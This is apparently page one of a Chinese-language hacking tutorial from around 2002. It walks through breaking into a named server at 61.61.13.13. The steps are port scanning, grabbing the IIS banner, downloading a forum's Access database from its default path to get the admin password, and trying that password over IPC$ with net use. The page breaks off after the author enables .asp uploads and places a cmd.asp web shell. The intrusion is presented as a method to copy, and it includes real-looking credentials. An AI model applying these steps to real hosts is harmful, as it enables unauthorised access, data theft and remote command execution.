其实现在网上安全站点和学黑的站点太多了,参与进来的人
也越来越多,这些促使了许多网站和个人增强安全意识,是件大好事.
所以诸如ipc$弱口令,printer,IDQ远程溢出,UNICODE,3389输入法等漏洞
已经相比之下少了很多.这里我们来聊聊如何不用以上的漏洞,
来入侵一台主机,加深一下对安全的理解.

某站点IP 61.61.13.13

开始:扫描端口,发现开放:80,135,139,1025

尝试获取IIS信息:
c:\tools>telnet 61.61.13.13 80
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Thu, 03 Jan 2002 19:26:59 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect. </body>
</html>
遗失对主机的连接。
C:\tools>
//是IIS5,综合以上信息基本判定为win2000服务器

尝试获取用户列表:
C:\tools>letmein \\61.61.13.13 -all -d
stating connecting to server ......
//失败!

尝试扫描iis cgi漏洞
略.
//做了安全配置,没有发现可利用之漏洞

接着开始浏览该站主页,
主页 http://61.61.13.13/index.htm
该网站很简单,主页采用html,没有使用ASP
论坛 http://61.61.13.13/bbs/default.asp
发现该站点有一ASP论坛,论坛为快乐论坛系统(以下均隐去真名)功能较多,共享程序
猜:综合端口扫描结果分析,此论坛应为ASP+ACCESS构建,因为在端口
扫描中没有发现诸如1433 3306等端口.(当然不是绝对的)

现在我们要从论坛入手了.
怎么入手呢?
可能有些同志马上就会开始测试%81,Translate:f.....
或猜文件名下载数据库,
但我觉得在不了解前就先不要盲目的碰.
现在开始在网上找这个论坛的程序下载
靠,好多地方都没有,
再搜...半小时后找到并下载.
呵呵~果然是用access
在自己的机器上装好此论坛,好好研究一下
发现:数据库名是fuck.mdb,在/data下,呵呵~
论坛有上传功能,需要设置,管理员登陆程序是poweruser_in.asp
差不多了,可以看看运气如何了.
http://61.61.13.13/bbs/data/fuck.mdb
晕倒!竟然没改,可以下载,
4M多,一会就完了,拿access2000或myadmin.asp打开数据库
顺利拿到论坛管理帐号:play/1314520
再看看运气,会不会论坛帐户密码和系统的一样:
net use \\61.61.13.13\ipc$ "1314520" /user:"play"
net use \\61.61.13.13\ipc$ "1314520" /user:"administrator"
//运气不好,都失败.

现在登陆论坛管理页,输入用户名及密码登陆论坛管理,
熟练的找到上传设置(为什么会熟练呢?因为已经了解)
将允许上传的文件类型中加上.asp
知道要干什么了吧?对,上传个ASP小程序(在浏览器中得到一个命令条,输入命令后在浏览器中返回结果)
上传cmd.asp到/upload下,好快,才1K多点,

[1] [2] 下一页